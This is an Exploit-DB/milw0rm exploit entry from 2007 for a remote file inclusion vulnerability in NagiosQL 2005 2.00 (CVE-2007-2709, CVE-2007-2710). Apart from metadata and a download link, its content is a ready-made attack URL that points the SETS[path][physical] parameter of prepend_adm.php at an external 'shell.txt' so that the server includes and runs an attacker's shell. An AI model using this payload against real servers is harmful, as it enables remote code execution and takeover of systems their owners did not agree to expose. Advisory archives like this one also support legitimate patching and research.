NagiosQL 2005 2.00 prepend_adm.php Remote File Inclusion Vuln

2007-05-14T00:00:00
ID EDB-ID:3919
Type exploitdb
Reporter ThE TiGeR
Modified 2007-05-14T00:00:00

Description

NagiosQL 2005 2.00 (prepend_adm.php) Remote File Inclusion Vuln. CVE-2007-2709,CVE-2007-2710. Webapps exploit for php platform

                                        
                                            #NagiosQL Remote file inclusion

#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz

#Thanks str0ke

#Exploit :

#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-14]